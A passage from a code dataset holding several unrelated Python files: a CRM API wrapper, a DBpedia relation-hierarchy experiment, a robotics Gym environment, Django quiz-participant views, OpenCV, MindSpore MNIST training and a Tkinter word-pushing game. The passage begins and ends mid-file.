PipelinedealsApi():\n\n def company(self, context, params):\n '''get company by id'''\n\n endpoint='companies'\n response = json.loads(util.rest(\"GET\",endpoint,context['headers'][\"api_key\"],{},params['company_id']).text)\n company_obj = PipelinedealsCompany(\n name=response['name'],\n website=response['web'],\n email=response['email'],\n address=response['address_1'],\n city=response['city'],\n state=response['state'],\n postal_code=response['postal_code'],\n country=response['country']\n )\n return company_obj.__dict__\n\n def deal(self, context, params):\n '''get deal by id'''\n \n endpoint='deals'\n response = json.loads(util.rest(\"GET\",endpoint,context['headers'][\"api_key\"],{},params['deal_id']).text)\n deal_obj = PipelinedealsDeal(\n name=response['name'],\n primary_contact_id=response['primary_contact_id'],\n status=response['status'],\n value=response['value']\n )\n return deal_obj.__dict__\n\n def person(self, context, params):\n '''get people by id'''\n \n endpoint='people'\n response = json.loads(util.rest(\"GET\",endpoint,context['headers'][\"api_key\"],{},params['person_id']).text)\n person_obj = PipelinedealsPerson(\n first_name=response['first_name'],\n last_name=response['last_name'],\n phone=response['phone'],\n position=response['position'],\n website=response['website'],\n email=response['email'],\n type=response['type'],\n work_address=response['work_address_1'],\n work_city=response['work_city'],\n work_state=response['work_state'],\n work_postal_code=response['work_postal_code'],\n work_country=response['work_country'],\n home_address=response['home_address_1'],\n home_city=response['home_city'],\n home_state=response['home_state'],\n home_country=response['home_country'],\n home_postal_code=response['home_postal_code'],\n summary=response['summary'],\n facebook_url=response['facebook_url']\n )\n return person_obj.__dict__\n\n def contacts_by_phone_number(self, context, params):\n '''get contacts by phone number'''\n\n endpoint = 'people/phone_number'\n response = json.loads(util.rest(\"GET\",endpoint,context['headers'][\"api_key\"],{},phone_number=params['person_phone']).text) \n contacts = response['entries']\n contact_value = []\n for contact in contacts:\n contact_obj = PipelinedealsPerson(\n contact_id=contact.get(\"id\") or None, \n first_name=contact.get(\"first_name\") or None,\n last_name=contact.get(\"last_name\") or None,\n phone=contact.get(\"phone\") or None,\n position=contact.get(\"position\") or None,\n website=contact.get(\"website\") or None,\n email=contact.get(\"email\") or None,\n type=contact.get(\"type\") or None,\n work_address=contact.get(\"work_address_1\") or None,\n work_city=contact.get(\"work_city\") or None,\n work_state=contact.get(\"work_state\") or None,\n work_postal_code=contact.get(\"work_postal_code\") or None,\n work_country=contact.get(\"work_country\") or None,\n home_address=contact.get(\"home_address_1\") or None,\n home_city=contact.get(\"home_city\") or None,\n home_state=contact.get(\"home_state\") or None,\n home_country=contact.get(\"home_country\") or None,\n home_postal_code=contact.get(\"home_postal_code\") or None,\n summary=contact.get(\"summary\") or None,\n facebook_url=contact.get(\"facebook_url\") or None,\n mobile=contact.get(\"mobile\") or None\n )\n contact_value.append(contact_obj.__dict__)\n return json.dumps(contact_value)\n","repo_name":"dipendrabaidawa/unified_api","sub_path":"unified/modules/main/categories/crm/pipelinedeals/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71716011239","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport os\nimport mysql.connector\nfrom itertools import combinations\nfrom math import sqrt\nfrom numpy import dot\nfrom numpy.linalg import norm\n\ntrueHeirarchyFile = \"parent-child-pairs.csv\"\nembeddingSize = 300\n\n# wilson returns the wilson score given the p and n values\ndef wilson(p,n,z=1.96):\n denominator = 1 + z**2/n\n centre_adj_prob = p + z*z/(2*n)\n adj_std_dev = sqrt((p*(1-p) + z*z/(4*n))/n)\n lower_bound = (centre_adj_prob - z*adj_std_dev)/denominator\n return lower_bound\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"\"\n)\n\nmycursor = mydb.cursor(dictionary=True)\n\nmycursor.execute(\"use btp\")\n\n# getAllIntersections returns all the intersection sizes of the pair of relations along with the support sizes of the relations.\n# This is accomplished via a join\ndef getAllIntersections():\n query = \"select dbpedia_intersect_size_restricted.size as 'intersectSize', binaryRel1, s1.size as 'size1', binaryRel2, s2.size as 'size2' from dbpedia_intersect_size_restricted, dbpedia_support_size_restricted s1, dbpedia_support_size_restricted s2 where s1.binaryRelation = binaryRel1 and s2.binaryRelation = binaryRel2\"\n mycursor.execute(query)\n result = mycursor.fetchall()\n return result\n\n# getAllRelationsToConsider returns all the relations with a non empty support set when the entity types are restricted\ndef getAllRelationsToConsider():\n query = \"select binaryRelation from dbpedia_support_size_restricted where size > 0\"\n mycursor.execute(query)\n result = mycursor.fetchall()\n rels = []\n for vals in result:\n rels.append(vals['binaryRelation'])\n return rels\n\n# getAllWilsonScores gets the wilson scores between all the relations that have non zero intersection sizes\ndef getAllWilsonScores(rels):\n allInters = getAllIntersections()\n relsWithScore = {}\n for row in allInters:\n intersect = row['intersectSize']\n rel1 = row['binaryRel1']\n rel2 = row['binaryRel2']\n size1 = row['size1']\n size2 = row['size2']\n\n if rel1 not in rels:\n continue\n if rel2 not in rels:\n continue\n\n if size1 > size2:\n size1,size2 = size2,size1\n rel1,rel2 = rel2,rel1\n\n score = wilson(intersect/size1,size1)\n relsWithScore[(rel2,rel1)] = score\n return relsWithScore\n\n# getTrueHeirarchy gets the true hierarchy from the csv file\ndef getTrueHeirarchy(rels):\n data = pd.read_csv(trueHeirarchyFile,header=None)\n heirarchy = [(x,y) for x,y in zip(data[0],data[1]) if x in rels and y in rels]\n return heirarchy\n\n# getHeirarchy creates the hierarchy with the best F1 score given the scores\ndef getHeirarchy(scores, heirarchy, toPrint):\n allPositives = len(heirarchy)\n truePositives = 0\n totalSet = 0\n prevScore = -1\n bestF1Score = -1\n cutoff = 0\n finalSize = 0\n finalPrecision = 0\n finalRecall = 0\n for (score,rel1,rel2) in scores:\n if score != prevScore and truePositives > 0:\n recall = truePositives/allPositives\n precision = truePositives/totalSet\n # print (\"Precision:\",precision, \"Recall:\",recall)\n f1 = 2 * precision * recall / (precision + recall)\n if f1 > bestF1Score:\n bestF1Score = f1\n cutoff = prevScore\n finalSize = totalSet\n finalRecall = recall\n finalPrecision = precision\n if (rel1,rel2) in heirarchy:\n truePositives += 1\n else:\n pass\n # print(rel1 + \",\" + rel2)\n totalSet += 1\n prevScore = score\n recall = truePositives/allPositives\n precision = truePositives/totalSet\n f1 = 2 * precision * recall / (precision + recall)\n if f1 > bestF1Score:\n bestF1Score = f1\n cutoff = 0\n if toPrint:\n print(\"Best F1 Score:\",bestF1Score)\n print(\"Cutoff:\",cutoff)\n print(\"Num Relations:\",finalSize)\n print(\"Precision:\",finalPrecision)\n print(\"Recall:\",finalRecall)\n return bestF1Score\n\n# getWords is used to split the relation name into words\ndef getWords(rel):\n words = []\n word = \"\"\n for c in rel:\n if c >='A' and c<='Z':\n words.append(word)\n word = \"\" + c.lower()\n else:\n word = word + c\n words.append(word)\n return words\n\n# readGloveEmbeddings is used to read the glove embeddings\ndef readGloveEmbeddings():\n embeddings_index = {}\n with open(\"../../glove/glove.6B.300d.txt\", encoding=\"utf-8\") as f:\n for line in f:\n word, coefs = line.split(maxsplit=1)\n coefs = np.fromstring(coefs, \"f\", sep=\" \")\n embeddings_index[word] = coefs\n print(\"Found %s word vectors.\" % len(embeddings_index))\n return embeddings_index\n\n# getEmbeddingsForRels gets the embeddings for all the relations passed. The method is described in the report.\ndef getEmbeddingsForRels(rels):\n embeddings_index = readGloveEmbeddings()\n embeddings = {}\n for rel in rels:\n words = getWords(rel)\n embedding = np.zeros(embeddingSize)\n for word in words:\n if word in embeddings_index:\n embedding += embeddings_index[word]\n embedding = embedding / len(words)\n embeddings[rel] = embedding\n return embeddings\n\n# getSimilarityBwEmbeddings is used to find the similarity scores between embeddings for all pairs of relations\ndef getSimilarityBwEmbeddings(rels,embeddings):\n simScores = {}\n for rel1 in rels:\n for rel2 in rels:\n score = 0\n if norm(embeddings[rel1])*norm(embeddings[rel2])!=0:\n score = dot(embeddings[rel1],embeddings[rel2])/(norm(embeddings[rel1])*norm(embeddings[rel2]))\n simScores[(rel1,rel2)] = score\n return simScores\n\n# getHeirarchyMixed is the function that gets the final scores based on the weight to both signals and call getHeirarchy\ndef getHeirarchyMixed(alpha,scores,simScores, rels, heirarchy, toPrint):\n beta = 1-alpha\n finalScores = []\n for rel1 in rels:\n for rel2 in rels:\n score = beta * simScores[(rel1,rel2)]\n if (rel1,rel2) in scores:\n score += scores[(rel1,rel2)]*alpha\n finalScores.append((score,rel1,rel2))\n finalScores.sort(reverse=True)\n return getHeirarchy(finalScores,heirarchy,toPrint)\n\n# getBestHeirarchy is used to find the best weight of the paramter used to weigh both the signals\ndef getBestHeirarchy(scores,simScores,rels,heirarchy):\n print(\"PATTY\")\n bestF1 = getHeirarchyMixed(1,scores,simScores,rels,heirarchy,True)\n bestAlpha = 1\n\n for alpha in np.linspace(0,1,20,endpoint=False):\n f1 = getHeirarchyMixed(alpha,scores,simScores,rels,heirarchy,False)\n if f1 > bestF1:\n bestF1 = f1\n bestAlpha = alpha\n\n print(\"Best Mixed\")\n print(\"Alpha\",alpha)\n getHeirarchyMixed(bestAlpha,scores,simScores,rels,heirarchy,True)\n\nrels = getAllRelationsToConsider()\nscores = getAllWilsonScores(rels)\nheirarchy = getTrueHeirarchy(rels)\nembeddings = getEmbeddingsForRels(rels)\nsimScores = getSimilarityBwEmbeddings(rels,embeddings)\ngetBestHeirarchy(scores,simScores,rels,heirarchy)\n\n\n","repo_name":"GuptaManan100/BTP","sub_path":"DBpedia/Restricted/getHeirarchyRestrictedMixed.py","file_name":"getHeirarchyRestrictedMixed.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22082309798","text":"import os\nfrom gym import utils\nfrom gym.envs.robotics import fetch_primitives_env\nimport numpy as np\n\n\n# Ensure we get the path separator correct on windows\nMODEL_XML_PATH = os.path.join('fetch', 'push_barrier.xml') # trying this\n\n\nclass FetchBarrierPrimitivesEnv(fetch_primitives_env.FetchPrimitivesEnv, utils.EzPickle):\n def __init__(self, reward_type='sparse'):\n initial_qpos = {\n 'robot0:slide0': 0.405,\n 'robot0:slide1': 0.48,\n 'robot0:slide2': 0.0,\n 'robot0:shoulder_pan_joint': 0,\n 'robot0:shoulder_lift_joint': -np.pi / 3,\n 'robot0:upperarm_roll_joint': 0,\n 'robot0:elbow_flex_joint': np.pi / 2,\n 'robot0:forearm_roll_joint': 0,\n 'robot0:wrist_flex_joint': np.pi / 4,\n 'robot0:wrist_roll_joint': 0,\n 'object0:joint': [1.25, 0.53, 0.4, 1., 0., 0., 0.],\n }\n fetch_primitives_env.FetchPrimitivesEnv.__init__(\n self, MODEL_XML_PATH, has_object=True, block_gripper=True, n_substeps=20,\n gripper_extra_height=0.0, target_in_the_air=False, target_offset=0.0,\n obj_range=0.15, target_range=0.15, distance_threshold=0.05,\n initial_qpos=initial_qpos, reward_type=reward_type, action_max=1.)\n utils.EzPickle.__init__(self)\n\n def _reset_sim(self):\n self._env_setup(self.initial_qpos)\n\n object_qpos = self.sim.data.get_joint_qpos('object0:joint')\n self.sim.data.set_joint_qpos('object0:joint', object_qpos)\n\n self.sim.forward()\n return True\n","repo_name":"amberxie88/gym","sub_path":"gym/envs/robotics/fetch/push_barrier.py","file_name":"push_barrier.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39445272742","text":"from django.utils.translation import gettext_lazy as _\nfrom django.conf import settings\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.urls import reverse\nfrom django.contrib import messages\nfrom django.views.generic import CreateView, DetailView, UpdateView\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.db.models import ProtectedError\n\nfrom django_tables2 import SingleTableView\n\nfrom champsquarebackend.core.loading import get_model, get_class, get_classes\nfrom champsquarebackend.core.compat import get_user_model\n\nQuiz = get_model('quiz', 'quiz')\nParticipant = get_model('participate', 'participant')\nParticipantTable = get_class('dashboard.participate.tables', 'ParticipantTable')\nParticipantForm = get_class('dashboard.participate.forms', 'ParticipantForm')\nUserListView = get_class('dashboard.users.views', 'UserListView')\n\nParticipantDispatcher = get_class('dashboard.participate.utils', 'ParticipantDispatcher')\n\n\nUser = get_user_model()\n\n\nclass QuizParticipantListView(UserListView):\n template_name = 'champsquarebackend/dashboard/participate/participants.html'\n model = Participant\n actions = ('remove_from_test', 'send_test_link',)\n table_class = ParticipantTable\n context_table_name = 'participants'\n\n\n def get_queryset(self):\n queryset = self._get_quiz().participants.all()\n \n return self.apply_search(queryset)\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = self.form\n context['quiz_id'] = self.kwargs['pk']\n return context\n\n def apply_search(self, queryset):\n # Set initial queryset description, used for template context\n self.desc_ctx = {\n 'main_filter': _('All Participants'),\n 'email_filter': '',\n 'name_filter': '',\n }\n if self.form.is_valid():\n return self.apply_search_filters(queryset, self.form.cleaned_data)\n else:\n return queryset\n\n def _get_quiz(self):\n if not hasattr(self, '_quiz'):\n self._quiz = get_object_or_404(Quiz, pk=self.kwargs['pk'])\n return self._quiz\n\n def remove_from_test(self, request, participants):\n # always delete via this way as it checks whether object exist or not first\n # participant_to_delete = Participant.objects \\\n # .filter(id__in=list(map(lambda participant: participant.id, participants)))\n participant_to_delete = Participant.objects \\\n .filter(id__in=[participant.id for participant in participants])\n try:\n participant_to_delete.delete()\n messages.success(self.request, _(\"Successfully removed participant from list\"))\n except ProtectedError:\n messages.error(self.request, _('Can\\'t delete protected user'))\n return redirect(reverse('dashboard:quiz-participant-list', kwargs={'pk': self._get_quiz().id}))\n\n def send_test_link(self, request, participants):\n site = get_current_site(request)\n response = None\n for participant in participants:\n ctx = {\n 'site': site,\n 'start_date_time': participant.start_date_time,\n 'video_monitoring_enabled': participant.video_monitoring_enabled,\n 'duration': participant.duration,\n 'otp_code': participant.generate_otp(),\n 'quiz_link': participant.get_absolute_url()\n }\n response = ParticipantDispatcher().send_quiz_link_email_for_user(participant, ctx)\n\n messages.info(self.request, _(response))\n return redirect(reverse('dashboard:quiz-participant-list', kwargs={'pk': self._get_quiz().id}))\n\n\nclass ParticipantDetailView(DetailView):\n model = Participant\n template_name = 'champsquarebackend/dashboard/participate/detail.html'\n context_object_name = 'participant'\n\n\nclass ParticipantCreateUpdateView(UpdateView):\n \"\"\"\n Dashboard view that can be used to create and update\n Category (similar to questions). It can be used in two different ways,\n each of them with unique URL pattern:\n - when creating a new subject.\n - when editing an existing question, this view is called with\n subject's primary key.\n \"\"\"\n template_name = 'champsquarebackend/dashboard/participate/participant_create_update.html'\n model = Participant\n context_object_name = 'participant'\n form_class = ParticipantForm\n creating = None\n\n def get_object(self, queryset=None):\n \"\"\"\n This parts allows generic.UpdateView to handle creating\n questions as well. The only distinction between an UpdateView\n and a CreateView is that self.object is None. We emulate this behavior.\n \"\"\"\n self.creating = 'pk' not in self.kwargs\n if self.creating:\n return None #success\n else:\n participant = get_object_or_404(Participant, pk=self.kwargs['pk'])\n return participant\n\n def get_quiz(self):\n if not hasattr(self, '_quiz'):\n self._quiz = get_object_or_404(Quiz, pk=self.kwargs['quiz_pk'])\n return self._quiz\n\n def get_context_data(self, **kwargs):\n ctx = super().get_context_data(**kwargs)\n ctx['title'] = self.get_page_title()\n ctx['quiz_pk'] = self.get_quiz().id\n\n # edit : add context data in here\n\n return ctx\n\n def get_page_title(self):\n if self.creating:\n return _('Create new Participant')\n else:\n return _('Update Participant %s') % self.object.full_name\n\n def get_success_url(self):\n \"\"\"\n return a success message and redirects to given url\n \"\"\"\n if self.creating:\n msg = _(\"Added participant '%s'\") % self.object.__str__()\n else:\n msg = _(\"Updated quiz '%s'\") % self.object.__str__()\n messages.success(self.request, msg)\n\n return reverse('dashboard:quiz-participant-list', kwargs={'pk': self.kwargs['quiz_pk']})\n","repo_name":"ChampSquare/ChampionSquareBackend","sub_path":"champsquarebackend/apps/dashboard/participate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25062456062","text":"import cv2\nimport numpy as np\n\n\n# 对原始图像进行向下取样,缩小分辨率\nimg = cv2.pyrDown(cv2.imread(\"C:/Users/LIUXINDONG/Desktop/opencv/images/chapter12/image/closing.bmp\", cv2.IMREAD_UNCHANGED))\n# 对图像进行二进制阈值化\nret, thresh = cv2.threshold(cv2.cvtColor(img.copy(), cv2.COLOR_BGR2GRAY), 127, 255, cv2.THRESH_BINARY)\n# 找出外侧轮廓\nimage, contours, hier = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\nfor c in contours:\n # 计算出一个简单的边界框\n x, y, w, h = cv2.boundingRect(c)\n # 将边界框画到图像上\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n # 计算出包围目标的最小矩形区域\n rect = cv2.minAreaRect(c)\n box = cv2.boxPoints(rect)\n bos = np.int0(box)\n # 画出改矩形\n cv2.drawContours(img, [box], 0, (0, 0, 255), 3)\n\n # 计算并画出最小闭圆\n (x, y), radius = cv2.minEnclosingCircle(c)\n center = (int(x), int(y))\n radius = int(radius)\n img = cv2.circle(img, center, radius, (0, 255, 0), 2)\n\ncv2.drawContours(img, contours, -1, (255, 0, 0), 1)\ncv2.imshow(\"contours\", img)\n","repo_name":"RabbitNoTeeth/opencv","sub_path":"learning_opencv3_with_python/chapter3/c339.py","file_name":"c339.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19892628361","text":"import yaml\nimport os\nimport re\nimport logging\nimport pickle\n\nfrom datetime import datetime, timedelta\n\n\nLOG_FORMAT = '%(asctime)-15s %(filename)s %(funcName)s line %(lineno)d %(levelname)s: %(message)s'\n\n# defining the regex pattern that the parser will use to 'implicitely' tag node\npattern = re.compile(r\"\\${(.*?)\\}\")\n\n\n# constructor that the parser will invoke for !envx\ndef envx_constructor(loader, node):\n value = loader.construct_scalar(node)\n env_var = pattern.match(value).groups()[0]\n return os.environ.get(env_var, '')\n\n\n# now define a custom tag ( say pathex ) and associate the regex pattern we defined\nyaml.add_implicit_resolver(\"!envx\", pattern)\n\n\n# 'register' the constructor so that the parser will invoke 'envx_constructor' for each node '!pathex'\nyaml.add_constructor('!envx', envx_constructor)\n\n\ndef parse_config(path=\"./config/config.yaml\"):\n \"\"\"\n parses yaml\n :param path: config path (default = ./config/config.yaml)\n :return: parsed config dict\n \"\"\"\n try:\n with open(path, 'r') as ymlfile:\n config = yaml.load(ymlfile)\n return config\n except Exception as e:\n logging.error(\"Error while parsing config.\\n{}\".format(e))\n\n\ndef json_to_model(json, obj):\n if not obj:\n return json\n keys = json.keys()\n for key in keys:\n if hasattr(obj, key):\n setattr(obj, key, json[key])\n else:\n return json\n return obj\n\n\ndef model_to_json(obj):\n if obj:\n return pickle.dumps(obj)\n return {}\n\n\ndef init_logging(file_path=None):\n if file_path:\n file_path = \"./logs_{}/{}\".format(datetime.now(), file_path)\n logging.basicConfig(format=LOG_FORMAT, level=\"INFO\", filename=file_path)\n return logging.getLogger()\n\n\ndef get_previous_date(days):\n return str(datetime.strftime(datetime.utcnow() - timedelta(days), \"%Y-%m-%d %H:%M:%S\"))\n","repo_name":"Divyang-Soni/User-Authentication-using-blockchain-technology","sub_path":"util/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"5611006784","text":"# LeNet5 MNIST\n\nimport os\n# os.environ['DEVICE_ID'] = '0'\n\nimport mindspore as ms\nimport mindspore.context as context\nimport mindspore.dataset.transforms.c_transforms as C\nimport mindspore.dataset.vision.c_transforms as CV\n\nfrom mindspore import nn,Tensor\nfrom mindspore.train import Model\nfrom mindspore.train.callback import LossMonitor, ModelCheckpoint, CheckpointConfig\nfrom mindspore.train.serialization import load_checkpoint, load_param_into_net\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom image_to_data import image_to_data\nfrom images import images_processing\n\ncontext.set_context(mode=context.GRAPH_MODE, device_target='CPU') # Ascend, CPU, GPU\n\n\ndef create_dataset(data_dir, training=True, batch_size=32, resize=(32, 32),\n rescale=1/(255*0.3081), shift=-0.1307/0.3081, buffer_size=64):\n data_train = os.path.join(data_dir, 'train') # train set\n data_test = os.path.join(data_dir, 'test') # test set\n ds = ms.dataset.MnistDataset(data_train if training else data_test)\n\n ds = ds.map(input_columns=[\"image\"], operations=[CV.Resize(resize), CV.Rescale(rescale, shift), CV.HWC2CHW()])\n ds = ds.map(input_columns=[\"label\"], operations=C.TypeCast(ms.int32))\n # When `dataset_sink_mode=True` on Ascend, append `ds = ds.repeat(num_epochs) to the end\n ds = ds.shuffle(buffer_size=buffer_size).batch(batch_size, drop_remainder=True)\n\n return ds\n\n\nclass LeNet5(nn.Cell):\n def __init__(self):\n super(LeNet5, self).__init__()\n self.conv1 = nn.Conv2d(1, 6, 5, stride=1, pad_mode='valid')\n self.conv2 = nn.Conv2d(6, 16, 5, stride=1, pad_mode='valid')\n self.relu = nn.ReLU()\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n self.flatten = nn.Flatten()\n self.fc1 = nn.Dense(400, 120)\n self.fc2 = nn.Dense(120, 84)\n self.fc3 = nn.Dense(84, 10)\n\n def construct(self, x):\n x = self.relu(self.conv1(x))\n x = self.pool(x)\n x = self.relu(self.conv2(x))\n x = self.pool(x)\n x = self.flatten(x)\n x = self.fc1(x)\n x = self.fc2(x)\n x = self.fc3(x)\n\n return x\n\n\ndef train(data_dir, lr=0.01, momentum=0.9, num_epochs=3, ckpt_name=\"lenet\"):\n ds_train = create_dataset(data_dir)\n ds_eval = create_dataset(data_dir, training=False)\n steps_per_epoch = ds_train.get_dataset_size()\n\n net = LeNet5()\n loss = nn.loss.SoftmaxCrossEntropyWithLogits(sparse=True, reduction='mean')\n opt = nn.Momentum(net.trainable_params(), lr, momentum)\n\n ckpt_cfg = CheckpointConfig(save_checkpoint_steps=steps_per_epoch, keep_checkpoint_max=5)\n ckpt_cb = ModelCheckpoint(prefix=ckpt_name, directory='ckpt', config=ckpt_cfg)\n loss_cb = LossMonitor(per_print_times=ds_train.get_dataset_size())\n\n model = Model(net, loss, opt, metrics={'acc', 'loss'})\n # dataset_sink_mode can be True when using Ascend\n model.train(num_epochs, ds_train, callbacks=[loss_cb, ckpt_cb], dataset_sink_mode=False)\n metrics = model.eval(ds_eval, dataset_sink_mode=False)\n print('Metrics:', metrics)\n\ndef infer(data,CKPT_2):\n #print(*data['image'][0][0][16][:], sep='\\n')\n images = data\n net = LeNet5()\n load_checkpoint(CKPT_2, net=net)\n model = Model(net)\n output = model.predict(Tensor(data, ms.float32))\n preds = np.argmax(output.asnumpy(), axis=1)\n\n for i in range(0, 11):\n plt.subplot(3, 4, i+1)\n plt.imshow(np.squeeze(images[i]))\n color = 'blue'\n plt.title(\"prediction: {},\".format(preds[i]), color=color)\n plt.xticks([])\n plt.savefig('test.png')\n plt.show()\nif __name__ == \"__main__\":\n data_path = 'MNIST/'\n train(data_path)\n print('Checkpoints after training:')\n print('\\n'.join(sorted([x for x in os.listdir('ckpt') if x.startswith('lenet')])))\n CKPT_2 = 'ckpt/lenet-3_2187.ckpt'\n images_processing('input.png')\n data = image_to_data('./image')\n infer(data,CKPT_2)\n","repo_name":"gaoaidi/Mnist-lenet5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4635155409","text":"###TartanHacks 2022\n###Team: wuhuTakeOff\n###github: https://github.com/Wuuuzula/wuHu-TakeOff\n\nfrom tkinter import *\nfrom tkinter.messagebox import *\nimport copy, string, time, sys\nimport pygame\nfrom PIL import Image, ImageTk\n\nroot = Tk()\nroot.title(\"WordPushingGame - Space to Restart\")\n\npygame.init()\n#Load music\nbgm = \"music/Equinoxe.mp3\"\nwuhu = \"music/wuhu.mp3\"\nmoveBox = \"music/moveBox.mp3\"\nwalk = \"music/walk.mp3\"\nmelting = \"music/melting.mp3\"\ndoorOpen = \"music/doorOpen.mp3\"\npygame.mixer.init()\npygame.mixer.music.load(bgm)\npygame.mixer.Channel(0).play(pygame.mixer.Sound(bgm))\n\nletters=list(string.ascii_uppercase)\nwalls=['W2','A2','L2','S2','N2','D2','W5','A5','V5','E5','S5']\nice=['I3','C3','E3']\ndoor=['D4','O4','R4','O4-20']\n\nallLetters=dict()\nfor i in letters:\n allLetters[i]=PhotoImage(file=f\"image/UpperLetterImages-White/{i}.png\")\nfor special in [walls,ice,door]:\n for i in special:\n allLetters[i]=PhotoImage(file=f\"image/specialBlocks/{i}.png\")\n\nallLetters['0']=PhotoImage(file=\"image/Black.png\")\nallLetters['me']=PhotoImage(file=\"image/specialBlocks/me.png\")\n\nmes = [PhotoImage(file=(\"image/specialBlocks/me.gif\"),format = 'gif -index %i' % (i)) for i in range(2)]\n\n# Original Map\nlevel = 0\nallMapList = [\n [\n ['0', 'W2', 'A2', 'L2', 'L2', 'S2', '0'], \n ['W2', '0', '0', '0', '0', '0', 'W2'], \n ['A2', '0', 'M', '0', 'L', '0', 'A2'], \n ['L2', '0', 'Y', '0', 'I', '0', 'L2'], \n ['L2', '0', '0', '0', 'K', '0', 'L2'], \n ['S2', '0', 'H', '0', 'E', '0', 'S2'], \n ['A2', '0', 'E', '0', '0', '0', 'I3'], \n ['N2', '0', 'A', '0', 'F', '0', 'C3'], \n ['D2', '0', 'R', '0', 'R', '0', 'E3'], \n ['W2', '0', 'T', '0', 'O', '0', 'W2'], \n ['A2', '0', '0', '0', 'Z', '0', 'A2'], \n ['L2', '0', 'me', '0', 'E', '0', 'L2'], \n ['L2', '0', 'S', '0', 'N', '0', 'L2'], \n ['S2', '0', '0', '0', '0', '0', 'S2'], \n ['0', 'W2', 'A2', 'L2', 'L2', 'S2', '0']\n ],\n [\n ['0', 'W2', 'A2', 'L2', 'L2', 'S2', '0'], \n ['W2', '0', '0', '0', '0', '0', 'W2'], \n ['A2', '0', 'me', '0', 'M', '0', 'A2'], \n ['L2', '0', '0', '0', 'Y', '0', 'L2'], \n ['L2', '0', 'L', '0', 'S', '0', 'L2'], \n ['S2', '0', 'O', '0', 'E', '0', 'S2'], \n ['A2', '0', 'C', '0', 'L', '0', 'A2'], \n ['N2', '0', 'K', '0', 'F', '0', 'N2'], \n ['D2', '0', 'E', '0', '0', '0', 'D2'], \n ['0', 'W2', 'D', '0', 'U', '0', 'W2'], \n ['0', 'A2', '0', '0', 'P', '0', 'A2'], \n ['0', 'L2', 'D4', 'O4', 'O4', 'R4', 'L2'], \n ['0', 'L2', '0', '0', '0', '0', 'L2'], \n ['0', 'S2', '0', '0', '0', '0', 'S2'], \n ['0', '0', '0', '0', '0', '0', '0']\n ],\n [\n ['W5', 'S5', 'E5', 'V5', 'A5', 'W5', 'S5'], \n ['A5', 'W5', 'S5', 'E5', 'V5', 'A5', 'W5'], \n ['V5', '0', 'D', '0', 'E5', 'V5', 'A5'], \n ['E5', '0', 'R', '0', 'S5', 'E5', 'V5'], \n ['S5', '0', 'O', '0', 'T', '0', 'E5'], \n ['W5', '0', 'W', '0', 'H', '0', 'S5'], \n ['A5', '0', 'N', '0', 'E', '0', 'W5'], \n ['V5', '0', '0', '0', '0', '0', 'A5'], \n ['E5', '0', 'me', '0', 'S', '0', 'V5'], \n ['S5', '0', 'N', '0', 'E', '0', 'E5'], \n ['W5', 'S5', '0', '0', 'A', '0', 'S5'], \n ['A5', 'W5', 'S5', 'E5', '0', '0', 'W5'], \n ['V5', 'A5', 'W5', 'S5', 'E5', 'V5', 'A5'], \n ['E5', 'V5', 'A5', 'W5', 'S5', 'E5', 'V5'], \n ['S5', 'E5', 'V5', 'A5', 'W5', 'S5', 'E5']\n ]\n]\n\n#Letters = boxes\n#Letters2/5 = wall/sea\n#Letters3 = ice\n#Lettera4 = door\n#me = player\n\nmapLength, mapWidth = len(allMapList[level]),len(allMapList[level][0])\n\n#create fading effect\nimages = [] \ndef create_rectangle(x1, y1, x2, y2, **kwargs):\n if 'alpha' in kwargs:\n alpha = int(kwargs.pop('alpha') * 255)\n fill = kwargs.pop('fill')\n fill = root.winfo_rgb(fill) + (alpha,)\n image = Image.new('RGBA', (x2-x1, y2-y1), fill)\n images.append(ImageTk.PhotoImage(image))\n cv.create_image(x1, y1, image=images[-1], anchor='nw')\n cv.create_rectangle(x1, y1, x2, y2, **kwargs)\n\ndef updateIce(): \n global icy\n create_rectangle(325, 325, 475, 375, fill='black', alpha= 0.2)\n icy = root.after(100,updateIce)\n\ndef updateDoor(): \n global doory\n cv.create_image((650, 150), image=allLetters['O4-20'])\n cv.create_image((650, 300), image=allLetters['O4-20'])\n create_rectangle(575, 175, 625, 275, fill='black', alpha= 0.2)\n doory = root.after(100,updateDoor)\n\ntrigger = 0\n# Paint the landscape\n\ndef drawGameImage():\n global posX, posY\n cv.delete('all')\n for row in range(mapLength):\n for col in range(mapWidth):\n if mapList[row][col] == 'me':\n # Player's position\n posX = row \n posY = col\n img = allLetters[mapList[row][col]]\n cv.create_image((row * 50+50, col * 50+50), image=allLetters['0'])\n cv.create_image((row * 50+50, col * 50+50), image=img)\n cv.pack()\n\ndef update(ind):\n me = mes[ind]\n ind += 1\n if ind >= 2:\n ind = 0\n allLetters['me'] = me\n if trigger!=1: drawGameImage()\n root.after(200, update, ind)\n\ndef callback(event): # Keyboard Control\n global posX, posY, mapList, trigger, icy, doory\n keyPressed = event.keysym\n #Player's current 